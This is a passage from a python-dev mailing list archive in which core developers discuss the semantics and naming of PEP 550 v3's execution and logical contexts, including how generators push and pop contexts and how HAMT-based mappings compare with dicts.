following toy generator: def tracking_gen(): start_tracking_iterations() while True: tally_iteration() yield task_id = ContextKey("task_id") iter_counter = ContextKey("iter_counter") def start_tracking_iterations(): iter_counter.set(collection.Counter()) def tally_iteration(): current_task = task_id.get() # Set elsewhere iter_counter.get()[current_task] += 1 Now, this isn't a very *sensible* generator (since it could just use a regular object instance for tracking instead of a context variable), but nevertheless, it's one that we would expect to work, and it's one that we would expect to exhibit the following properties: 1. When tally_iteration() calls task_id.get(), we expect that to be resolved in the context calling next() on the instance, *not* the context where the generator was first created 2. When tally_iteration() calls iter_counter.get(), we expect that to be resolved in the same context where start_tracking_iterations() called iter_counter.set() This has consequences for the design in the PEP: * what we want to capture at generator creation time is the context where writes will happen, and we also want that to be the innermost context used for lookups * other than that innermost context, we want everything else to be dynamic * this means that "mutable context saved on the generator" and "entire dynamic context visible when the generator runs" aren't the same thing And hence the introduction of the LocalContext/LogicalContext terminology for the former, and the ExecutionContext terminology for the latter. It's also where the analogy with ChainMap came from (although I don't think this has made it into the PEP itself): * LogicalContext is the equivalent of the individual mappings * ExecutionContext is the equivalent of ChainMap * ContextKey.get() replaces ChainMap.__getitem__ * ContextKey.set(value) replaces ChainMap.__setitem__ * ContextKey.set(None) replaces ChainMap.__delitem__ While the context is defined conceptually as a nested chain of key:value mappings, we avoid using the mapping syntax because of the way the values can shift dynamically out from under you based on who called you - while the ChainMap analogy is hopefully helpful to understanding, we don't want people taking it too literally or things will become more confusing rather than less. Despite that risk, taking the analogy further is where the DynamicWriteContext + DynamicLookupContext terminology idea came from: * like ChainMap.new_child(), adjusting the DynamicWriteContext changes what ck.set() affects, and also sets the innermost context for ck.get() * like using a different ChainMap, adjusting the DynamicLookupContext changes what ck.get() can see (unlike ChainMap, it also isolates ck.set() by default) I'll also note that the first iteration of the PEP didn't really make this distinction, and it caused a problem that Nathaniel pointed out: generators would "snapshot" their entire dynamic context when first created, and then never adjust it for external changes between iterations. This meant that if you adjusted something like the decimal context outside the generator after creating it, it would ignore those changes - instead of having the problem of changes inside the generator leaking out, we instead had the problem of changes outside the generator *not* making their way in, even if you wanted them to. Due to that heritage, fixing some of the examples could easily have been missed in the v2 rewrite that introduced the distinction between the two kinds of context. > (Another critique of the proposal I have is that it adds too many > similarly-named functions to sys. But this email is already too long and I > need to go to bed.) If it helps any, one of the ideas that has come up is to put all of the proposed context manipulation APIs in contextlib rather than in sys, and I think that's a reasonable idea (I don't think any of us actually like the notion of adding that many new subsystem specific APIs directly to sys). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ethan at stoneleaf.us Mon Aug 21 12:37:29 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Mon, 21 Aug 2017 09:37:29 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170821134348.155d17a1@fsol> References: <20170821134348.155d17a1@fsol> Message-ID: <599B0C49.404@stoneleaf.us> On 08/21/2017 04:43 AM, Antoine Pitrou wrote: > On Mon, 21 Aug 2017 01:45:05 -0400 > "Jim J. Jewett" wrote: >> Building on Brett's suggestion: >> >> FrameContext: used in/writable by one frame > > It's not frame-specific, it's actually shared by an arbitrary number of > frames (by default, all frames in a given thread). You're thinking too specifically. A FrameContext/LogicalContext/LocalContext/etc is just a larger frame; although I would go with ExecutionContext/ContextFrame, myself. -- ~Ethan~ From yselivanov.ml at gmail.com Mon Aug 21 13:17:15 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 13:17:15 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599B0C49.404@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> Message-ID: -1 on using "frame" in PEP 550 terminology. Antoine is right, the API is not frame-specific, and "frame" in Python has only one meaning. I can certainly see how "ContextFrame" can be correct if we think about "frame" as a generic term, but in Python, people will inadvertently think about a connection with frame objects/stacks. Yury From guido at python.org Mon Aug 21 15:10:06 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 21 Aug 2017 12:10:06 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 7:12 AM, Nick Coghlan wrote: > On 21 August 2017 at 15:03, Guido van Rossum wrote: > > Honestly I'm not sure we need the distinction between LC and EC. If you > read > > carefully some of the given example code seems to confuse them. If we > could > > get away with only a single framework-facing concept, I would be happy > > calling it ExecutionContext. > > Unfortunately, I don't think we can, and that's why I tried to reframe > the discussion in terms of "Where ContextKey.set() writes to" and > "Where ContextKey.get() looks things up". > > Consider the following toy generator: > > def tracking_gen(): > start_tracking_iterations() > while True: > tally_iteration() > yield > > task_id = ContextKey("task_id") > iter_counter = ContextKey("iter_counter") > > def start_tracking_iterations(): > iter_counter.set(collection.Counter()) > > def tally_iteration(): > current_task = task_id.get() # Set elsewhere > iter_counter.get()[current_task] += 1 > > Now, this isn't a very *sensible* generator (since it could just use a > regular object instance for tracking instead of a context variable), > but nevertheless, it's one that we would expect to work, and it's one > that we would expect to exhibit the following properties: > > 1. When tally_iteration() calls task_id.get(), we expect that to be > resolved in the context calling next() on the instance, *not* the > context where the generator was first created > 2. When tally_iteration() calls iter_counter.get(), we expect that to > be resolved in the same context where start_tracking_iterations() > called iter_counter.set() > > This has consequences for the design in the PEP: > > * what we want to capture at generator creation time is the context > where writes will happen, and we also want that to be the innermost > context used for lookups > * other than that innermost context, we want everything else to be dynamic > * this means that "mutable context saved on the generator" and "entire > dynamic context visible when the generator runs" aren't the same thing > > And hence the introduction of the LocalContext/LogicalContext > terminology for the former, and the ExecutionContext terminology for > the latter. > OK, this is a sensible explanation. I think the PEP would benefit from including some version of it early on (though perhaps shortened a bit). > It's also where the analogy with ChainMap came from (although I don't > think this has made it into the PEP itself): > > * LogicalContext is the equivalent of the individual mappings > * ExecutionContext is the equivalent of ChainMap > * ContextKey.get() replaces ChainMap.__getitem__ > * ContextKey.set(value) replaces ChainMap.__setitem__ > * ContextKey.set(None) replaces ChainMap.__delitem__ > > While the context is defined conceptually as a nested chain of > key:value mappings, we avoid using the mapping syntax because of the > way the values can shift dynamically out from under you based on who > called you - while the ChainMap analogy is hopefully helpful to > understanding, we don't want people taking it too literally or things > will become more confusing rather than less. > Agreed. However now I am confused as to how the HAMT fits in. Yury says somewhere that the HAMT will be used for the EC and then cloning the EC is just returning a pointer to the same EC. But even if I interpret that as making a new EC containing a pointer to the same underlying HAMT, I don't see how that will preserve the semantics that different logical threads, running interleaved (like different generators being pumped alternatingly), will see updates to LCs that are lower on the stack of LCs in the EC. (I see this with the stack-of-dicts version, but not with the immutable HAMT inplementation.) > Despite that risk, taking the analogy further is where the > DynamicWriteContext + DynamicLookupContext terminology idea came from: > > * like ChainMap.new_child(), adjusting the DynamicWriteContext changes > what ck.set() affects, and also sets the innermost context for > ck.get() > * like using a different ChainMap, adjusting the DynamicLookupContext > changes what ck.get() can see (unlike ChainMap, it also isolates > ck.set() by default) > Here I'm lost again. In the PEP's pseudo code, your first bullet seems to be the operation "push a new LC on the stack of the current EC". Does the second bullet just mean "switch to a different EC"? > I'll also note that the first iteration of the PEP didn't really make > this distinction, and it caused a problem that Nathaniel pointed out: > generators would "snapshot" their entire dynamic context when first > created, and then never adjust it for external changes between > iterations. This meant that if you adjusted something like the decimal > context outside the generator after creating it, it would ignore those > changes - instead of having the problem of changes inside the > generator leaking out, we instead had the problem of changes outside > the generator *not* making their way in, even if you wanted them to. > OK, this really needs to be made very clear early in the PEP. Maybe this final sentence provides the key requirement: changes outside the generator should make it into the generator when next() is invoked, unless the generator itself has made an override; but changes inside the generator should not leak out through next(). > Due to that heritage, fixing some of the examples could easily have > been missed in the v2 rewrite that introduced the distinction between > the two kinds of context. > At this point I would like to suggest that maybe you and/or Nathaniel could volunteer as co-authors for the PEP. You could then also help Yury clean up his grammar (e.g. adding "the" in various places) and improve the general structure of the PEP. > > (Another critique of the proposal I have is that it adds too many > > similarly-named functions to sys. But this email is already too long and > I > > need to go to bed.) > > If it helps any, one of the ideas that has come up is to put all of > the proposed context manipulation APIs in contextlib rather than in > sys, and I think that's a reasonable idea (I don't think any of us > actually like the notion of adding that many new subsystem specific > APIs directly to sys). > I don't think it belongs in contextlib. That module is about contexts for use in with-statements; here we are not particularly concerned with those but with manipulating state that is associated with a logical thread. I think it makes more sense to add a new module for this purpose. I also think that some of the framework-facing APIs should probably be methods rather than functions. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 15:50:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 15:50:04 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 3:10 PM, Guido van Rossum wrote: [..] > Agreed. However now I am confused as to how the HAMT fits in. Yury says > somewhere that the HAMT will be used for the EC and then cloning the EC is > just returning a pointer to the same EC. But even if I interpret that as > making a new EC containing a pointer to the same underlying HAMT, I don't > see how that will preserve the semantics that different logical threads, > running interleaved (like different generators being pumped alternatingly), > will see updates to LCs that are lower on the stack of LCs in the EC. (I see > this with the stack-of-dicts version, but not with the immutable HAMT > inplementation.) Few important things (using the current PEP 550 terminology): * ExecutionContext is a *dynamic* stack of LogicalContexts. * LCs do not reference other LCs. * ContextKey.set() can only modify the *top* LC in the stack. If LC is a mutable mapping: # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] a.set(c) # LC4 = EC.top() # LC4[a] = c # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] If LC are implemented with immutable mappings: # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] a.set(c) # LC4 = EC.pop() # LC4_1 = LC4.copy() # LC4_1[a] = c # EC.push(LC4_1) # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] Any code that uses EC will not see any difference, because it can only work with the top LC. Back to generators. Generators have their own empty LCs when created to store their *local* EC modifications. When a generator is *being* iterated, it pushes its LC to the EC. When the iteration step is finished, it pops its LC from the EC. If you have nested generators, they will dynamically build a stack of their LCs while they are iterated. Therefore, generators *naturally* control the stack of EC. We can't execute two generators simultaneously in one thread (we can only iterate them one by one), so the top LC always belongs to the current generator that is being iterated: def nested_gen(): # EC = [outer_LC, gen1_LC, nested_gen_LC] yield # EC = [outer_LC, gen1_LC, nested_gen_LC] yield def gen1(): # EC = [outer_LC, gen1_LC] n = nested_gen() yield # EC = [outer_LC, gen1_LC] next(n) # EC = [outer_LC, gen1_LC] yield next(n) # EC = [outer_LC, gen1_LC] def gen2(): # EC = [outer_LC, gen2_LC] yield # EC = [outer_LC, gen2_LC] yield g1 = gen1() g2 = gen2() next(g1) next(g2) next(g1) next(g2) HAMT is a way to efficiently implement immutable mappings with O(log32 N) set operation, that's it. If we implement immutable mappings using regular dicts and copy, set() would be O(log N). [..] >> >> I'll also note that the first iteration of the PEP didn't really make >> this distinction, and it caused a problem that Nathaniel pointed out: >> generators would "snapshot" their entire dynamic context when first >> created, and then never adjust it for external changes between >> iterations. This meant that if you adjusted something like the decimal >> context outside the generator after creating it, it would ignore those >> changes - instead of having the problem of changes inside the >> generator leaking out, we instead had the problem of changes outside >> the generator *not* making their way in, even if you wanted them to. > > > OK, this really needs to be made very clear early in the PEP. Maybe this > final sentence provides the key requirement: changes outside the generator > should make it into the generator when next() is invoked, unless the > generator itself has made an override; but changes inside the generator > should not leak out through next(). It's covered here with two examples: https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators Yury From yselivanov.ml at gmail.com Mon Aug 21 15:53:02 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 15:53:02 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: Message-ID: On Sat, Aug 19, 2017 at 4:17 AM, Nick Coghlan wrote: [..] >> >> * Generator's ``.send()`` and ``.throw()`` methods are modified as >> follows (in pseudo-C):: >> >> if gen.__logical_context__ is not NULL: >> tstate = PyThreadState_Get() >> >> tstate.execution_context.push(gen.__logical_context__) >> >> try: >> # Perform the actual `Generator.send()` or >> # `Generator.throw()` call. >> return gen.send(...) >> finally: >> gen.__logical_context__ = tstate.execution_context.pop() >> else: >> # Perform the actual `Generator.send()` or >> # `Generator.throw()` call. >> return gen.send(...) > > I think this pseudo-code expansion includes a few holdovers from the > original visibly-immutable API design. > > Given the changes since then, I think this would be clearer if the > first branch used sys.run_with_logical_context(), since the logical > context references at the Python layer now behave like shared mutable > objects, and the apparent immutability of > sys.run_with_execution_context() comes from injecting a fresh logical > context every time. This is a good idea, I like it! It will indeed simplify the explanation. Yury From k7hoven at gmail.com Mon Aug 21 17:14:46 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 00:14:46 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:12 PM, Nick Coghlan wrote: > On 21 August 2017 at 15:03, Guido van Rossum wrote: > > Honestly I'm not sure we need the distinction between LC and EC. If you > read > > carefully some of the given example code seems to confuse them. If we > could > > get away with only a single framework-facing concept, I would be happy > > calling it ExecutionContext. > > Unfortunately, I don't think we can, and that's why I tried to reframe > the discussion in terms of "Where ContextKey.set() writes to" and > "Where ContextKey.get() looks things up". > > Consider the following toy generator: > > def tracking_gen(): > start_tracking_iterations() > while True: > tally_iteration() > yield > > task_id = ContextKey("task_id") > iter_counter = ContextKey("iter_counter") > > def start_tracking_iterations(): > iter_counter.set(collection.Counter()) > > def tally_iteration(): > current_task = task_id.get() # Set elsewhere > iter_counter.get()[current_task] += 1 > > Now, this isn't a very *sensible* generator (since it could just use a > regular object instance for tracking instead of a context variable), > but nevertheless, it's one that we would expect to work, and it's one > that we would expect to exhibit the following properties: > > 1. When tally_iteration() calls task_id.get(), we expect that to be > resolved in the context calling next() on the instance, *not* the > context where the generator was first created > 2. When tally_iteration() calls iter_counter.get(), we expect that to > be resolved in the same context where start_tracking_iterations() > called iter_counter.set() > > This has consequences for the design in the PEP: > > * what we want to capture at generator creation time is the context > where writes will happen, and we also want that to be the innermost > context used for lookups > ?I don't get it. How is this a consequence of the above two points? And why do we need to capture something (a "context") at generator creation time? ?-- Koos? > * other than that innermost context, we want everything else to be dynamic > * this means that "mutable context saved on the generator" and "entire > dynamic context visible when the generator runs" aren't the same thing > > And hence the introduction of the LocalContext/LogicalContext > terminology for the former, and the ExecutionContext terminology for > the latter. > > > ?[...]? -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 17:25:10 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 17:25:10 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:14 PM, Koos Zevenhoven wrote: [..] >> This has consequences for the design in the PEP: >> >> * what we want to capture at generator creation time is the context >> where writes will happen, and we also want that to be the innermost >> context used for lookups > > > I don't get it. How is this a consequence of the above two points? And why > do we need to capture something (a "context") at generator creation time? > We don't need to "capture" anything when a generator is created (it was something that PEP 550 version 1 was doing). In the current version of the PEP, generators are initialized with an empty LogicalContext. When they are being iterated (started or resumed), their LogicalContext is pushed to the EC. When the iteration is stopped (or paused), they pop their LC from the EC. Yury From k7hoven at gmail.com Mon Aug 21 17:39:00 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 00:39:00 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 12:25 AM, Yury Selivanov wrote: > On Mon, Aug 21, 2017 at 5:14 PM, Koos Zevenhoven > wrote: > [..] > >> This has consequences for the design in the PEP: > >> > >> * what we want to capture at generator creation time is the context > >> where writes will happen, and we also want that to be the innermost > >> context used for lookups > > > > > > I don't get it. How is this a consequence of the above two points? And > why > > do we need to capture something (a "context") at generator creation time? > > > > We don't need to "capture" anything when a generator is created (it > was something that PEP 550 version 1 was doing). > > ?Ok, good.? > In the current version of the PEP, generators are initialized with an > empty LogicalContext. When they are being iterated (started or > resumed), their LogicalContext is pushed to the EC. When the > iteration is stopped (or paused), they pop their LC from the EC. > > Another quick one before I go: Do we really need to push and pop a LC on each next() call?, even if it most likely will never be touched? -- Koos -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 17:44:53 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 17:44:53 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:39 PM, Koos Zevenhoven wrote: [..] >> In the current version of the PEP, generators are initialized with an >> empty LogicalContext. When they are being iterated (started or >> resumed), their LogicalContext is pushed to the EC. When the >> iteration is stopped (or paused), they pop their LC from the EC. >> > > Another quick one before I go: Do we really need to push and pop a LC on > each next() call, even if it most likely will never be touched? Yes, otherwise it will be hard to maintain the consistency of the stack. There will be an optimization: if the LC is empty, we will push NULL to the stack, thus avoiding the cost of allocating an object. I measured the overhead -- generators will become 0.5-1% slower in microbenchmarks, but only when they do pretty much nothing. If a generator contains more Python code than a bare "yield" expression, the overhead will be harder to detect. Yury From greg.ewing at canterbury.ac.nz Mon Aug 21 20:02:07 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 22 Aug 2017 12:02:07 +1200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> Message-ID: <599B747F.1050208@canterbury.ac.nz> Yury Selivanov wrote: > I can certainly see how "ContextFrame" can be correct if we think > about "frame" as a generic term, but in Python, people will > inadvertently think about a connection with frame objects/stacks. Calling it ExecutionContextFrame rather than just ContextFrame would make it clear that it relates to ExecutionContexts in particular. -- Greg From guido at python.org Mon Aug 21 20:06:11 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 21 Aug 2017 17:06:11 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 12:50 PM, Yury Selivanov wrote: > Few important things (using the current PEP 550 terminology): > > * ExecutionContext is a *dynamic* stack of LogicalContexts. > * LCs do not reference other LCs. > * ContextKey.set() can only modify the *top* LC in the stack. > > If LC is a mutable mapping: > > # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] > > a.set(c) > # LC4 = EC.top() > # LC4[a] = c > > # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] > > If LC are implemented with immutable mappings: > > # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] > > a.set(c) > # LC4 = EC.pop() > # LC4_1 = LC4.copy() > # LC4_1[a] = c > # EC.push(LC4_1) > > # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] > > Any code that uses EC will not see any difference, because it can only > work with the top LC. > OK, good. This makes more sense, especially if I read "the EC" as shorthand for the EC stored in the current thread's per-thread state. The immutable mapping (if used) is used for the LC, not for the EC, and in this case cloning an EC would simply make a shallow copy of its underlying list -- whereas without the immutable mapping, cloning the EC would also require making shallow copies of each LC. And I guess the linked-list implementation (Approach #3 in the PEP) makes EC cloning an O(1) operation. Note that there is a lot of hand-waving and shorthand in this explanation, but I think I finally follow the design. It is going to be a big task to write this up in a didactic way -- the current PEP needs a fair amount of help in that sense. (If you want to become a better writer, I've recently enjoyed reading Steven Pinker's *The Sense of Style*: The Thinking Person's Guide to Writing in the 21st Century. Amongst other fascinating topics, it explains why so often what we think is clearly written can cause so much confusion.) > Back to generators. Generators have their own empty LCs when created > to store their *local* EC modifications. > > When a generator is *being* iterated, it pushes its LC to the EC. When > the iteration step is finished, it pops its LC from the EC. If you > have nested generators, they will dynamically build a stack of their > LCs while they are iterated. > > Therefore, generators *naturally* control the stack of EC. We can't > execute two generators simultaneously in one thread (we can only > iterate them one by one), so the top LC always belongs to the current > generator that is being iterated: > > def nested_gen(): > # EC = [outer_LC, gen1_LC, nested_gen_LC] > yield > # EC = [outer_LC, gen1_LC, nested_gen_LC] > yield > > def gen1(): > # EC = [outer_LC, gen1_LC] > n = nested_gen() > yield > # EC = [outer_LC, gen1_LC] > next(n) > # EC = [outer_LC, gen1_LC] > yield > next(n) > # EC = [outer_LC, gen1_LC] > > def gen2(): > # EC = [outer_LC, gen2_LC] > yield > # EC = [outer_LC, gen2_LC] > yield > > g1 = gen1() > g2 = gen2() > > next(g1) > next(g2) > next(g1) > next(g2) > This, combined with your later clarification: > In the current version of the PEP, generators are initialized with an > empty LogicalContext. When they are being iterated (started or > resumed), their LogicalContext is pushed to the EC. When the > iteration is stopped (or paused), they pop their LC from the EC. makes it clear how the proposal works for generators. There's an important piece that I hadn't figured out from Nick's generator example, because I had mistakenly assumed that something *would* be captured at generator create time. It's a reasonable mistake to make, I think -- the design space here is just huge and there are many variations that don't affect typical code but do differ in edge cases. Your clear statement "nothing needs to be captured" is helpful to avoid this misunderstanding. > HAMT is a way to efficiently implement immutable mappings with O(log32 > N) set operation, that's it. If we implement immutable mappings using > regular dicts and copy, set() would be O(log N). > This sounds like abuse of the O() notation. Mathematically O(log N) and O(log32 N) surely must be equivalent, since log32 N is just K*(log N) for some constant K (about 0.288539), and the constant disappears in the O(), as O(K*f(N)) and O(f(N)) are equivalent. Now, I'm happy to hear that a HAMT-based implementation is faster than a dict+copy-based implementation, but I don't think your use of O() makes sense here. > [..] > >> > >> I'll also note that the first iteration of the PEP didn't really make > >> this distinction, and it caused a problem that Nathaniel pointed out: > >> generators would "snapshot" their entire dynamic context when first > >> created, and then never adjust it for external changes between > >> iterations. This meant that if you adjusted something like the decimal > >> context outside the generator after creating it, it would ignore those > >> changes - instead of having the problem of changes inside the > >> generator leaking out, we instead had the problem of changes outside > >> the generator *not* making their way in, even if you wanted them to. > > > > > > OK, this really needs to be made very clear early in the PEP. Maybe this > > final sentence provides the key requirement: changes outside the > generator > > should make it into the generator when next() is invoked, unless the > > generator itself has made an override; but changes inside the generator > > should not leak out through next(). > > It's covered here with two examples: > https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators > I think what's missing is the fact that this is one of the key motivating reasons for the design (starting with v2 of the PEP). When I encountered that section I just skimmed it, assuming it was mostly just showing how to apply the given semantics to generators. I also note some issues with the use of tense here -- it's a bit confusing to follow which parts of the text refer to defects of the current (pre-PEP) situation and which parts refer to how the proposal would solve these defects. -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 20:31:37 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 20:31:37 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 8:06 PM, Guido van Rossum wrote: > On Mon, Aug 21, 2017 at 12:50 PM, Yury Selivanov > wrote: >> >> Few important things (using the current PEP 550 terminology): >> >> * ExecutionContext is a *dynamic* stack of LogicalContexts. >> * LCs do not reference other LCs. >> * ContextKey.set() can only modify the *top* LC in the stack. >> >> If LC is a mutable mapping: >> >> # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] >> >> a.set(c) >> # LC4 = EC.top() >> # LC4[a] = c >> >> # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] >> >> If LC are implemented with immutable mappings: >> >> # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] >> >> a.set(c) >> # LC4 = EC.pop() >> # LC4_1 = LC4.copy() >> # LC4_1[a] = c >> # EC.push(LC4_1) >> >> # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] >> >> Any code that uses EC will not see any difference, because it can only >> work with the top LC. > > > OK, good. This makes more sense, especially if I read "the EC" as shorthand > for the EC stored in the current thread's per-thread state. That's exactly what I meant by "the EC". > The immutable > mapping (if used) is used for the LC, not for the EC, and in this case > cloning an EC would simply make a shallow copy of its underlying list -- > whereas without the immutable mapping, cloning the EC would also require > making shallow copies of each LC. And I guess the linked-list implementation > (Approach #3 in the PEP) makes EC cloning an O(1) operation. All correct. > > Note that there is a lot of hand-waving and shorthand in this explanation, > but I think I finally follow the design. It is going to be a big task to > write this up in a didactic way -- the current PEP needs a fair amount of > help in that sense. Elvis Pranskevichus (our current What's New editor and my colleague) offered me to help with the PEP. He's now working on a partial rewrite. I've been working on this PEP for about a month now and at this point it makes it difficult for me to dump this knowledge in a nice and readable way (in any language that I know, FWIW). > (If you want to become a better writer, I've recently > enjoyed reading Steven Pinker's The Sense of Style: The Thinking Person's > Guide to Writing in the 21st Century. Amongst other fascinating topics, it > explains why so often what we think is clearly written can cause so much > confusion.) Will definitely check it out, thank you! > >> >> Back to generators. Generators have their own empty LCs when created >> to store their *local* EC modifications. >> >> When a generator is *being* iterated, it pushes its LC to the EC. When >> the iteration step is finished, it pops its LC from the EC. If you >> have nested generators, they will dynamically build a stack of their >> LCs while they are iterated. >> >> Therefore, generators *naturally* control the stack of EC. We can't >> execute two generators simultaneously in one thread (we can only >> iterate them one by one), so the top LC always belongs to the current >> generator that is being iterated: >> >> def nested_gen(): >> # EC = [outer_LC, gen1_LC, nested_gen_LC] >> yield >> # EC = [outer_LC, gen1_LC, nested_gen_LC] >> yield >> >> def gen1(): >> # EC = [outer_LC, gen1_LC] >> n = nested_gen() >> yield >> # EC = [outer_LC, gen1_LC] >> next(n) >> # EC = [outer_LC, gen1_LC] >> yield >> next(n) >> # EC = [outer_LC, gen1_LC] >> >> def gen2(): >> # EC = [outer_LC, gen2_LC] >> yield >> # EC = [outer_LC, gen2_LC] >> yield >> >> g1 = gen1() >> g2 = gen2() >> >> next(g1) >> next(g2) >> next(g1) >> next(g2) > > > This, combined with your later clarification: > >> In the current version of the PEP, generators are initialized with an >> empty LogicalContext. When they are being iterated (started or >> resumed), their LogicalContext is pushed to the EC. When the >> iteration is stopped (or paused), they pop their LC from the EC. > > makes it clear how the proposal works for generators. There's an important > piece that I hadn't figured out from Nick's generator example, because I had > mistakenly assumed that something *would* be captured at generator create > time. It's a reasonable mistake to make, Yeah, it is very subtle. > >> >> HAMT is a way to efficiently implement immutable mappings with O(log32 >> N) set operation, that's it. If we implement immutable mappings using >> regular dicts and copy, set() would be O(log N). > > > This sounds like abuse of the O() notation. Mathematically O(log N) and > O(log32 N) surely must be equivalent, since log32 N is just K*(log N) for > some constant K (about 0.288539), and the constant disappears in the O(), as > O(K*f(N)) and O(f(N)) are equivalent. Now, I'm happy to hear that a > HAMT-based implementation is faster than a dict+copy-based implementation, > but I don't think your use of O() makes sense here. I made a typo there: when implementing an immutable mapping with Python dicts, setting a key is an O(N) operation (not O(log N)): we need to make a shallow copy of a dict and then add an item to it. (the PEP doesn't have this typo) With HAMT, set() is O(log32 N): https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png Yury From yselivanov.ml at gmail.com Mon Aug 21 20:41:45 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 20:41:45 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 8:06 PM, Guido van Rossum wrote: [..] >> > OK, this really needs to be made very clear early in the PEP. Maybe this >> > final sentence provides the key requirement: changes outside the >> > generator >> > should make it into the generator when next() is invoked, unless the >> > generator itself has made an override; but changes inside the generator >> > should not leak out through next(). >> >> It's covered here with two examples: >> https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators > > > I think what's missing is the fact that this is one of the key motivating > reasons for the design (starting with v2 of the PEP). When I encountered > that section I just skimmed it, assuming it was mostly just showing how to > apply the given semantics to generators. I also note some issues with the > use of tense here -- it's a bit confusing to follow which parts of the text > refer to defects of the current (pre-PEP) situation and which parts refer to > how the proposal would solve these defects. I see. The proposal always uses present tense to describe things it adds, and I now see that this is indeed very confusing. This needs to be fixed. Yury From greg.ewing at canterbury.ac.nz Mon Aug 21 19:39:31 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 22 Aug 2017 11:39:31 +1200 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <599945C5.1030300@stoneleaf.us> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> Message-ID: <599B6F33.9050803@canterbury.ac.nz> Ethan Furman wrote: > So I like ExecutionContext for the stack of > WhateverWeCallTheOtherContext contexts. But what do we call it? How about ExecutionContextFrame, by analogy with stack/stack frame. -- Greg From ncoghlan at gmail.com Tue Aug 22 01:09:05 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 22 Aug 2017 15:09:05 +1000 Subject: 